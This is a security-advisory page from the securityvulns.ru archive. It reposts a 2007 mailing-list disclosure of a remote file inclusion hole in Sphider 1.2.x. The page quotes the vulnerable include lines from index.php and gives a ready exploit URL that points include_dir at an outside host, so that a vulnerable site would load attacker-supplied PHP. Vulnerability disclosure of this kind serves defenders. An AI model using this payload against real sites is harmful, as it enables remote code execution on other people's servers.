Computer Security

Security Advisory: Sphider Version 1.2.x (include_dir) file include
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability

  Actualite bulletins fr/site.asp SQL Injection Vulnerability

From:1one1_(at)_lifeisbeginer.org <1one1_(at)_lifeisbeginer.org>
Date:29.04.2007
Subject:Sphider Version 1.2.x (include_dir) file include

# Sphider Version 1.2.x (include_dir) remote file include
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php
$include_dir = "./include";  <--- no patch here
$language_dir = "./languages";
include "$include_dir/index_header.inc";
include "$include_dir/conf.php";
include "$include_dir/connect.php";

exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu?
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server